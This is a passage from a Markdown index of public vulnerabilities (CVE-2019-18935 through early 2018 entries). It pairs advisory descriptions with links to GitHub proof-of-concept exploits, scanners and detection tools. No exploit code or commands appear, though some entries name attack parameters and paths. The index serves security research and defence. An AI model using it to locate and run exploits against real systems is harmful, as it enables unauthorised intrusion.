- [ThanHuuTuan/Telerik_CVE-2019-18935](https://github.com/ThanHuuTuan/Telerik_CVE-2019-18935)
- [ThanHuuTuan/CVE_2019_18935](https://github.com/ThanHuuTuan/CVE_2019_18935)
- [murataydemir/CVE-2019-18935](https://github.com/murataydemir/CVE-2019-18935)
- [appliedi/Telerik_CVE-2019-18935](https://github.com/appliedi/Telerik_CVE-2019-18935)
- [random-robbie/CVE-2019-18935](https://github.com/random-robbie/CVE-2019-18935)
- [0xAgun/CVE-2019-18935-checker](https://github.com/0xAgun/CVE-2019-18935-checker)
- [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation)
- [dust-life/CVE-2019-18935-memShell](https://github.com/dust-life/CVE-2019-18935-memShell)
### CVE-2019-18988 (2020-02-07)
TeamViewer Desktop through 14.7.1965 allows a bypass of remote-login access control because the same key is used for different customers' installations. It used a shared AES key for all installations since at least as far back as v7.0.43148, and used it for at least OptionsPasswordAES in the current version of the product. If an attacker were to know this key, they could decrypt protect information stored in the registry or configuration files of TeamViewer. With versions before v9.x , this allowed for attackers to decrypt the Unattended Access password to the system (which allows for remote login to the system as well as headless file browsing). The latest version still uses the same key for OptionPasswordAES but appears to have changed how the Unattended Access password is stored. While in most cases an attacker requires an existing session on a system, if the registry/configuration keys were stored off of the machine (such as in a file share or online), an attacker could then decrypt the required password to login to the system.
- [reversebrain/CVE-2019-18988](https://github.com/reversebrain/CVE-2019-18988)
- [mr-r3b00t/CVE-2019-18988](https://github.com/mr-r3b00t/CVE-2019-18988)
### CVE-2019-19012 (2019-11-16)
An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read, in which the offset of this read is under the control of an attacker. (This only affects the 32-bit compiled version). Remote attackers can cause a denial-of-service or information disclosure, or possibly have unspecified other impact, via a crafted regular expression.
- [ManhNDd/CVE-2019-19012](https://github.com/ManhNDd/CVE-2019-19012)
- [tarantula-team/CVE-2019-19012](https://github.com/tarantula-team/CVE-2019-19012)
### CVE-2019-19030 (2022-12-26)
Cloud Native Computing Foundation Harbor before 1.10.3 and 2.x before 2.0.1 allows resource enumeration because unauthenticated API calls reveal (via the HTTP status code) whether a resource exists.
- [shodanwashere/boatcrash](https://github.com/shodanwashere/boatcrash)
### CVE-2019-19033 (2019-11-21)
Jalios JCMS 10 allows attackers to access any part of the website and the WebDAV server with administrative privileges via a backdoor account, by using any username and the hardcoded dev password.
- [ricardojoserf/CVE-2019-19033](https://github.com/ricardojoserf/CVE-2019-19033)
### CVE-2019-19194 (2020-02-12)
The Bluetooth Low Energy Secure Manager Protocol (SMP) implementation on Telink Semiconductor BLE SDK versions before November 2019 for TLSR8x5x through 3.4.0, TLSR823x through 1.3.0, and TLSR826x through 3.3 devices installs a zero long term key (LTK) if an out-of-order link-layer encryption request is received during Secure Connections pairing. An attacker in radio range can have arbitrary read/write access to protected GATT service data, cause a device crash, or possibly control a device's function by establishing an encrypted session with the zero LTK.
- [louisabricot/writeup-cve-2019-19194](https://github.com/louisabricot/writeup-cve-2019-19194)
### CVE-2019-19203 (2019-11-21)
An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read.
- [ManhNDd/CVE-2019-19203](https://github.com/ManhNDd/CVE-2019-19203)
- [tarantula-team/CVE-2019-19203](https://github.com/tarantula-team/CVE-2019-19203)
### CVE-2019-19204 (2019-11-21)
An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND. This leads to a heap-based buffer over-read.
- [ManhNDd/CVE-2019-19204](https://github.com/ManhNDd/CVE-2019-19204)
- [tarantula-team/CVE-2019-19204](https://github.com/tarantula-team/CVE-2019-19204)
### CVE-2019-19231 (2019-12-20)
An insecure file access vulnerability exists in CA Client Automation 14.0, 14.1, 14.2, and 14.3 Agent for Windows that can allow a local attacker to gain escalated privileges.
- [hessandrew/CVE-2019-19231](https://github.com/hessandrew/CVE-2019-19231)
### CVE-2019-19268
- [TheCyberGeek/CVE-2019-19268](https://github.com/TheCyberGeek/CVE-2019-19268)
### CVE-2019-19315 (2019-12-17)
NLSSRV32.EXE in Nalpeiron Licensing Service 7.3.4.0, as used with Nitro PDF and other products, allows Elevation of Privilege via the \\.\mailslot\nlsX86ccMailslot mailslot.
- [monoxgas/mailorder](https://github.com/monoxgas/mailorder)
### CVE-2019-19356 (2020-02-07)
Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing.
- [shadowgatt/CVE-2019-19356](https://github.com/shadowgatt/CVE-2019-19356)
- [qq1515406085/CVE-2019-19356](https://github.com/qq1515406085/CVE-2019-19356)
### CVE-2019-19369
- [TheCyberGeek/CVE-2019-19369](https://github.com/TheCyberGeek/CVE-2019-19369)
### CVE-2019-19383 (2019-12-03)
freeFTPd 1.0.8 has a Post-Authentication Buffer Overflow via a crafted SIZE command (this is exploitable even if logging is disabled).
- [killvxk/CVE-2019-19383](https://github.com/killvxk/CVE-2019-19383)
### CVE-2019-19393 (2020-10-01)
The Web application on Rittal CMC PU III 7030.000 V3.00 V3.11.00_2 to V3.15.70_4 devices fails to sanitize user input on the system configurations page. This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts) as the content is always displayed after and before login. Persistent XSS allows an attacker to modify displayed content or to change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or a hijacked session.
- [miguelhamal/CVE-2019-19393](https://github.com/miguelhamal/CVE-2019-19393)
### CVE-2019-19447 (2019-12-08)
In the Linux kernel 5.0.21, mounting a crafted ext4 filesystem image, performing some operations, and unmounting can lead to a use-after-free in ext4_put_super in fs/ext4/super.c, related to dump_orphan_list in fs/ext4/super.c.
- [Trinadh465/linux-4.19.72_CVE-2019-19447](https://github.com/Trinadh465/linux-4.19.72_CVE-2019-19447)
### CVE-2019-19470 (2019-12-30)
Unsafe usage of .NET deserialization in Named Pipe message processing allows privilege escalation to NT AUTHORITY\SYSTEM for a local attacker. Affected product is TinyWall, all versions up to and including 2.1.12. Fixed in version 2.1.13.
- [juliourena/CVE-2019-19470-RedTeamRD](https://github.com/juliourena/CVE-2019-19470-RedTeamRD)
### CVE-2019-19492 (2019-12-02)
FreeSWITCH 1.6.10 through 1.10.1 has a default password in event_socket.conf.xml.
- [Chocapikk/CVE-2019-19492](https://github.com/Chocapikk/CVE-2019-19492)
- [tucommenceapousser/CVE-2019-19492](https://github.com/tucommenceapousser/CVE-2019-19492)
- [tucommenceapousser/CVE-2019-19492-2](https://github.com/tucommenceapousser/CVE-2019-19492-2)
### CVE-2019-19511
- [jra89/CVE-2019-19511](https://github.com/jra89/CVE-2019-19511)
### CVE-2019-19520 (2019-12-04)
xlock in OpenBSD 6.6 allows local users to gain the privileges of the auth group by providing a LIBGL_DRIVERS_PATH environment variable, because xenocara/lib/mesa/src/loader/loader.c mishandles dlopen.
- [retrymp3/Openbsd-Privilege-Escalation](https://github.com/retrymp3/Openbsd-Privilege-Escalation)
### CVE-2019-19547 (2020-01-13)
Symantec Endpoint Detection and Response (SEDR), prior to 4.3.0, may be susceptible to a cross site scripting (XSS) issue. XSS is a type of issue that can enable attackers to inject client-side scripts into web pages viewed by other users. An XSS vulnerability may be used by attackers to potentially bypass access controls such as the same-origin policy.
- [nasbench/CVE-2019-19547](https://github.com/nasbench/CVE-2019-19547)
### CVE-2019-19550 (2020-01-31)
Remote Authentication Bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 allows admin access to sensitive information of affected users using vulnerable versions. The attacker only needs to provide the correct URL.
- [underprotection/CVE-2019-19550](https://github.com/underprotection/CVE-2019-19550)
- [redteambrasil/CVE-2019-19550](https://github.com/redteambrasil/CVE-2019-19550)
### CVE-2019-19576 (2019-12-04)
class.upload.php in verot.net class.upload before 1.0.3 and 2.x before 2.0.4, as used in the K2 extension for Joomla! and other products, omits .phar from the set of dangerous file extensions.
- [jra89/CVE-2019-19576](https://github.com/jra89/CVE-2019-19576)
### CVE-2019-19609 (2019-12-05)
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
- [ebadfd/CVE-2019-19609](https://github.com/ebadfd/CVE-2019-19609)
- [diego-tella/CVE-2019-19609-EXPLOIT](https://github.com/diego-tella/CVE-2019-19609-EXPLOIT)
- [guglia001/CVE-2019-19609](https://github.com/guglia001/CVE-2019-19609)
- [D3m0nicw0lf/CVE-2019-19609](https://github.com/D3m0nicw0lf/CVE-2019-19609)
- [n000xy/CVE-2019-19609-POC-Python](https://github.com/n000xy/CVE-2019-19609-POC-Python)
- [RamPanic/CVE-2019-19609-EXPLOIT](https://github.com/RamPanic/CVE-2019-19609-EXPLOIT)
- [glowbase/CVE-2019-19609](https://github.com/glowbase/CVE-2019-19609)
### CVE-2019-19633
- [jra89/CVE-2019-19633](https://github.com/jra89/CVE-2019-19633)
### CVE-2019-19634 (2019-12-17)
class.upload.php in verot.net class.upload through 1.0.3 and 2.x through 2.0.4, as used in the K2 extension for Joomla! and other products, omits .pht from the set of dangerous file extensions, a similar issue to CVE-2019-19576.
- [jra89/CVE-2019-19634](https://github.com/jra89/CVE-2019-19634)
### CVE-2019-19651
- [jra89/CVE-2019-19651](https://github.com/jra89/CVE-2019-19651)
### CVE-2019-19652
- [jra89/CVE-2019-19652](https://github.com/jra89/CVE-2019-19652)
### CVE-2019-19653
- [jra89/CVE-2019-19653](https://github.com/jra89/CVE-2019-19653)
### CVE-2019-19654
- [jra89/CVE-2019-19654](https://github.com/jra89/CVE-2019-19654)
### CVE-2019-19658
- [jra89/CVE-2019-19658](https://github.com/jra89/CVE-2019-19658)
### CVE-2019-19699 (2020-04-06)
There is Authenticated remote code execution in Centreon Infrastructure Monitoring Software through 19.10 via Pollers misconfiguration, leading to system compromise via apache crontab misconfiguration, This allows the apache user to modify an executable file executed by root at 22:30 every day. To exploit the vulnerability, someone must have Admin access to the Centreon Web Interface and create a custom main.php?p=60803&type=3 command. The user must then set the Pollers Post-Restart Command to this previously created command via the main.php?p=60901&o=c&server_id=1 URI. This is triggered via an export of the Poller Configuration.
- [SpengeSec/CVE-2019-19699](https://github.com/SpengeSec/CVE-2019-19699)
### CVE-2019-19781 (2019-12-27)
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
- [projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781)
- [trustedsec/cve-2019-19781](https://github.com/trustedsec/cve-2019-19781)
- [cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781)
- [jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781)
- [ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781)
- [mpgn/CVE-2019-19781](https://github.com/mpgn/CVE-2019-19781)
- [oways/CVE-2019-19781](https://github.com/oways/CVE-2019-19781)
- [becrevex/Citrix_CVE-2019-19781](https://github.com/becrevex/Citrix_CVE-2019-19781)
- [unknowndevice64/Exploits_CVE-2019-19781](https://github.com/unknowndevice64/Exploits_CVE-2019-19781)
- [haxrob/citrixmash_scanner](https://github.com/haxrob/citrixmash_scanner)
- [jamesjguthrie/Shitrix-CVE-2019-19781](https://github.com/jamesjguthrie/Shitrix-CVE-2019-19781)
- [haxrob/CVE-2019-19781](https://github.com/haxrob/CVE-2019-19781)
- [hollerith/CVE-2019-19781](https://github.com/hollerith/CVE-2019-19781)
- [aqhmal/CVE-2019-19781](https://github.com/aqhmal/CVE-2019-19781)
- [MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot)
- [mekhalleh/citrix_dir_traversal_rce](https://github.com/mekhalleh/citrix_dir_traversal_rce)
- [zenturacp/cve-2019-19781-web](https://github.com/zenturacp/cve-2019-19781-web)
- [zgelici/CVE-2019-19781-Checker](https://github.com/zgelici/CVE-2019-19781-Checker)
- [digitalshadows/CVE-2019-19781_IOCs](https://github.com/digitalshadows/CVE-2019-19781_IOCs)
- [onSec-fr/CVE-2019-19781-Forensic](https://github.com/onSec-fr/CVE-2019-19781-Forensic)
- [DanielWep/CVE-NetScalerFileSystemCheck](https://github.com/DanielWep/CVE-NetScalerFileSystemCheck)
- [Castaldio86/Detect-CVE-2019-19781](https://github.com/Castaldio86/Detect-CVE-2019-19781)
- [j81blog/ADC-19781](https://github.com/j81blog/ADC-19781)
- [b510/CVE-2019-19781](https://github.com/b510/CVE-2019-19781)
- [redscan/CVE-2019-19781](https://github.com/redscan/CVE-2019-19781)
- [digitalgangst/massCitrix](https://github.com/digitalgangst/massCitrix)
- [mandiant/ioc-scanner-CVE-2019-19781](https://github.com/mandiant/ioc-scanner-CVE-2019-19781)
- [citrix/ioc-scanner-CVE-2019-19781](https://github.com/citrix/ioc-scanner-CVE-2019-19781)
- [haxrob/citrix-honeypot](https://github.com/haxrob/citrix-honeypot)
- [L4r1k/CitrixNetscalerAnalysis](https://github.com/L4r1k/CitrixNetscalerAnalysis)
- [Azeemering/CVE-2019-19781-DFIR-Notes](https://github.com/Azeemering/CVE-2019-19781-DFIR-Notes)
- [0xams/citrixvulncheck](https://github.com/0xams/citrixvulncheck)
- [r4ulcl/CVE-2019-19781](https://github.com/r4ulcl/CVE-2019-19781)
- [nmanzi/webcvescanner](https://github.com/nmanzi/webcvescanner)
- [darren646/CVE-2019-19781POC](https://github.com/darren646/CVE-2019-19781POC)
- [Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201](https://github.com/Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201)
- [yukar1z0e/CVE-2019-19781](https://github.com/yukar1z0e/CVE-2019-19781)
- [SharpHack/CVE-2019-19781](https://github.com/SharpHack/CVE-2019-19781)
- [qiong-qi/CVE-2019-19781-poc](https://github.com/qiong-qi/CVE-2019-19781-poc)
- [w4fz5uck5/CVE-2019-19781-CitrixRCE](https://github.com/w4fz5uck5/CVE-2019-19781-CitrixRCE)
- [andripwn/CVE-2019-19781](https://github.com/andripwn/CVE-2019-19781)
- [VladRico/CVE-2019-19781](https://github.com/VladRico/CVE-2019-19781)
- [pwn3z/CVE-2019-19781-Citrix](https://github.com/pwn3z/CVE-2019-19781-Citrix)
- [Vulnmachines/Ctirix_RCE-CVE-2019-19781](https://github.com/Vulnmachines/Ctirix_RCE-CVE-2019-19781)
- [k-fire/CVE-2019-19781-exploit](https://github.com/k-fire/CVE-2019-19781-exploit)
- [zerobytesecure/CVE-2019-19781](https://github.com/zerobytesecure/CVE-2019-19781)
- [citrixgitoff/-ioc-scanner-CVE-2019-19781](https://github.com/citrixgitoff/-ioc-scanner-CVE-2019-19781)
### CVE-2019-19782 (2019-12-13)
The FTP client in AceaXe Plus 1.0 allows a buffer overflow via a long EHLO response from an FTP server.
- [Underwood12/CVE-2019-19782](https://github.com/Underwood12/CVE-2019-19782)
### CVE-2019-19842 (2020-01-22)
emfd in Ruckus Wireless Unleashed through 200.7.10.102.64 allows remote attackers to execute OS commands via a POST request with the attribute xcmd=spectra-analysis to admin/_cmdstat.jsp via the mac attribute.
- [bdunlap9/CVE-2019-19842](https://github.com/bdunlap9/CVE-2019-19842)
### CVE-2019-19844 (2019-12-18)
Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user's email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)
- [ryu22e/django_cve_2019_19844_poc](https://github.com/ryu22e/django_cve_2019_19844_poc)
- [andripwn/django_cve201919844](https://github.com/andripwn/django_cve201919844)
- [0xsha/CVE_2019_19844](https://github.com/0xsha/CVE_2019_19844)
### CVE-2019-19871
- [VDISEC/CVE-2019-19871-AuditGuide](https://github.com/VDISEC/CVE-2019-19871-AuditGuide)
### CVE-2019-19905 (2019-12-19)
NetHack 3.6.x before 3.6.4 is prone to a buffer overflow vulnerability when reading very long lines from configuration files. This affects systems that have NetHack installed suid/sgid, and shared systems that allow users to upload their own configuration files.
- [dpmdpm2/CVE-2019-19905](https://github.com/dpmdpm2/CVE-2019-19905)
### CVE-2019-19919 (2019-12-20)
Versions of handlebars prior to 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution. Templates may alter an Object's __proto__ and __defineGetter__ properties, which may allow an attacker to execute arbitrary code through crafted payloads.
- [fazilbaig1/CVE-2019-19919](https://github.com/fazilbaig1/CVE-2019-19919)
### CVE-2019-19945 (2020-03-16)
uhttpd in OpenWrt through 18.06.5 and 19.x through 19.07.0-rc2 has an integer signedness error. This leads to out-of-bounds access to a heap buffer and a subsequent crash. It can be triggered with an HTTP POST request to a CGI script, specifying both "Transfer-Encoding: chunked" and a large negative Content-Length value.
- [delicateByte/CVE-2019-19945_Test](https://github.com/delicateByte/CVE-2019-19945_Test)
### CVE-2019-20059 (2020-02-10)
payment_manage.ajax.php and various *_manage.ajax.php in MFScripts YetiShare 3.5.2 through 4.5.4 directly insert values from the sSortDir_0 parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL Injection. NOTE: this issue exists because of an incomplete fix for CVE-2019-19732.
- [cve-vuln/CVE-2019-20059](https://github.com/cve-vuln/CVE-2019-20059)
### CVE-2019-20085 (2019-12-30)
TVT NVMS-1000 devices allow GET /.. Directory Traversal
- [AleDiBen/NVMS1000-Exploit](https://github.com/AleDiBen/NVMS1000-Exploit)
### CVE-2019-20197 (2019-12-31)
In Nagios XI 5.6.9, an authenticated user is able to execute arbitrary OS commands via shell metacharacters in the id parameter to schedulereport.php, in the context of the web-server user account.
- [lp008/CVE-2019-20197](https://github.com/lp008/CVE-2019-20197)
- [jas502n/CVE-2019-20197](https://github.com/jas502n/CVE-2019-20197)
### CVE-2019-20224 (2020-01-09)
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742.
- [mhaskar/CVE-2019-20224](https://github.com/mhaskar/CVE-2019-20224)
### CVE-2019-20326 (2020-03-16)
A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c in GNOME gThumb before 3.8.3 and Linux Mint Pix before 2.4.5 allows attackers to cause a crash and potentially execute arbitrary code via a crafted JPEG file.
- [Fysac/CVE-2019-20326](https://github.com/Fysac/CVE-2019-20326)
### CVE-2019-20361 (2020-01-08)
There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability).
- [jerrylewis9/CVE-2019-20361-EXPLOIT](https://github.com/jerrylewis9/CVE-2019-20361-EXPLOIT)
### CVE-2019-20372 (2020-01-09)
NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer.
- [vuongnv3389-sec/CVE-2019-20372](https://github.com/vuongnv3389-sec/CVE-2019-20372)
- [0xleft/CVE-2019-20372](https://github.com/0xleft/CVE-2019-20372)
### CVE-2019-20933 (2020-11-19)
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
- [LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
- [Hydragyrum/CVE-2019-20933](https://github.com/Hydragyrum/CVE-2019-20933)
### CVE-2019-25024 (2021-02-19)
OpenRepeater (ORP) before 2.2 allows unauthenticated command injection via shell metacharacters in the functions/ajax_system.php post_service parameter.
- [codexlynx/CVE-2019-25024](https://github.com/codexlynx/CVE-2019-25024)
### CVE-2019-25137 (2023-05-18)
Umbraco CMS 4.11.8 through 7.15.10, and 7.12.4, allows Remote Code Execution by authenticated administrators via msxsl:script in an xsltSelection to developer/Xslt/xsltVisualize.aspx.
- [Ickarah/CVE-2019-25137-Version-Research](https://github.com/Ickarah/CVE-2019-25137-Version-Research)
### CVE-2019-48814
- [wucj001/cve-2019-48814](https://github.com/wucj001/cve-2019-48814)
### CVE-2019-1002101 (2019-04-01)
The kubectl cp command allows copying files between containers and the user machine. To copy files from a container, Kubernetes creates a tar inside the container, copies it over the network, and kubectl unpacks it on the user’s machine. If the tar binary in the container is malicious, it could run any code and output unexpected, malicious results. An attacker could use this to write files to any path on the user’s machine when kubectl cp is called, limited only by the system permissions of the local user. The untar function can both create and follow symbolic links. The issue is resolved in kubectl v1.11.9, v1.12.7, v1.13.5, and v1.14.0.
- [brompwnie/CVE-2019-1002101-Helpers](https://github.com/brompwnie/CVE-2019-1002101-Helpers)
### CVE-2019-1003000 (2019-01-22)
A sandbox bypass vulnerability exists in Script Security Plugin 1.49 and earlier in src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java that allows attackers with the ability to provide sandboxed scripts to execute arbitrary code on the Jenkins master JVM.
- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
- [adamyordan/cve-2019-1003000-jenkins-rce-poc](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc)
- [slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins)
- [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION)
- [purple-WL/Jenkins_CVE-2019-1003000](https://github.com/purple-WL/Jenkins_CVE-2019-1003000)
### CVE-2019-1010054 (2019-07-18)
Dolibarr 7.0.0 is affected by: Cross Site Request Forgery (CSRF). The impact is: allow malitious html to change user password, disable users and disable password encryptation. The component is: Function User password change, user disable and password encryptation. The attack vector is: admin access malitious urls.
- [chaizeg/CSRF-breach](https://github.com/chaizeg/CSRF-breach)
### CVE-2019-1010268 (2019-07-18)
Ladon since 0.6.1 (since ebef0aae48af78c159b6fce81bc6f5e7e0ddb059) is affected by: XML External Entity (XXE). The impact is: Information Disclosure, reading files and reaching internal network endpoints. The component is: SOAP request handlers. For instance: https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688. The attack vector is: Send a specially crafted SOAP call.
- [Tonyynot14/CVE-2019-1010268](https://github.com/Tonyynot14/CVE-2019-1010268)
### CVE-2019-1010298 (2019-07-15)
Linaro/OP-TEE OP-TEE 3.3.0 and earlier is affected by: Buffer Overflow. The impact is: Code execution in the context of TEE core (kernel). The component is: optee_os. The fixed version is: 3.4.0 and later.
- [RKX1209/CVE-2019-1010298](https://github.com/RKX1209/CVE-2019-1010298)
### CVE-2019-1020010 (2019-07-29)
Misskey before 10.102.4 allows hijacking a user's token.
- [DXY0411/CVE-2019-1020010](https://github.com/DXY0411/CVE-2019-1020010)
## 2018
### CVE-2018-0101 (2018-01-29)
A vulnerability in the Secure Sockets Layer (SSL) VPN functionality of the Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. The vulnerability is due to an attempt to double free a region of memory when the webvpn feature is enabled on the Cisco ASA device. An attacker could exploit this vulnerability by sending multiple, crafted XML packets to a webvpn-configured interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system, or cause a reload of the affected device. This vulnerability affects Cisco ASA Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, ASA 1000V Cloud Firewall, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4110 Security Appliance, Firepower 9300 ASA Security Module, Firepower Threat Defense Software (FTD). Cisco Bug IDs: CSCvg35618.
- [1337g/CVE-2018-0101-DOS-POC](https://github.com/1337g/CVE-2018-0101-DOS-POC)
- [Cymmetria/ciscoasa_honeypot](https://github.com/Cymmetria/ciscoasa_honeypot)
- [MikeHorn-git/CVE-2018-0101](https://github.com/MikeHorn-git/CVE-2018-0101)
### CVE-2018-0114 (2018-01-04)
A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Signature (JWS) standard for JSON Web Tokens (JWTs). This standard specifies that a JSON Web Key (JWK) representing a public key can be embedded within the header of a JWS. This public key is then trusted for verification. An attacker could exploit this by forging valid JWS objects by removing the original signature, adding a new public key to the header, and then signing the object using the (attacker-owned) private key associated with the public key embedded in that JWS header.
- [zi0Black/POC-CVE-2018-0114](https://github.com/zi0Black/POC-CVE-2018-0114)
- [Logeirs/CVE-2018-0114](https://github.com/Logeirs/CVE-2018-0114)
- [adityathebe/POC-CVE-2018-0114](https://github.com/adityathebe/POC-CVE-2018-0114)
- [Eremiel/CVE-2018-0114](https://github.com/Eremiel/CVE-2018-0114)
- [Starry-lord/CVE-2018-0114](https://github.com/Starry-lord/CVE-2018-0114)
- [scumdestroy/CVE-2018-0114](https://github.com/scumdestroy/CVE-2018-0114)
- [j4k0m/CVE-2018-0114](https://github.com/j4k0m/CVE-2018-0114)
- [mmeza-developer/CVE-2018-0114](https://github.com/mmeza-developer/CVE-2018-0114)
- [Pandora-research/CVE-2018-0114-Exploit](https://github.com/Pandora-research/CVE-2018-0114-Exploit)
- [amr9k8/jwt-spoof-tool](https://github.com/amr9k8/jwt-spoof-tool)
### CVE-2018-0171 (2018-03-28)
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash. Cisco Bug IDs: CSCvg76186.
- [AlrikRr/Cisco-Smart-Exploit](https://github.com/AlrikRr/Cisco-Smart-Exploit)
### CVE-2018-0202 (2018-03-27)
clamscan in ClamAV before 0.99.4 contains a vulnerability that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation checking mechanisms when handling Portable Document Format (.pdf) files sent to an affected device. An unauthenticated, remote attacker could exploit this vulnerability by sending a crafted .pdf file to an affected device. This action could cause an out-of-bounds read when ClamAV scans the malicious file, allowing the attacker to cause a DoS condition. This concerns pdf_parse_array and pdf_parse_string in libclamav/pdfng.c. Cisco Bug IDs: CSCvh91380, CSCvh91400.
- [jaychowjingjie/CVE-2018-0202](https://github.com/jaychowjingjie/CVE-2018-0202)
### CVE-2018-0208 (2018-03-08)
A vulnerability in the web-based management interface of the (cloud based) Cisco Registered Envelope Service could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected service. The vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface of the affected service. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. Cisco Bug IDs: CSCvg74126.
- [dima5455/Cve-2018-0208](https://github.com/dima5455/Cve-2018-0208)
### CVE-2018-0296 (2018-06-07)
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.
- [milo2012/CVE-2018-0296](https://github.com/milo2012/CVE-2018-0296)
- [yassineaboukir/CVE-2018-0296](https://github.com/yassineaboukir/CVE-2018-0296)
- [bhenner1/CVE-2018-0296](https://github.com/bhenner1/CVE-2018-0296)
- [qiantu88/CVE-2018-0296](https://github.com/qiantu88/CVE-2018-0296)
### CVE-2018-0708 (2018-07-16)
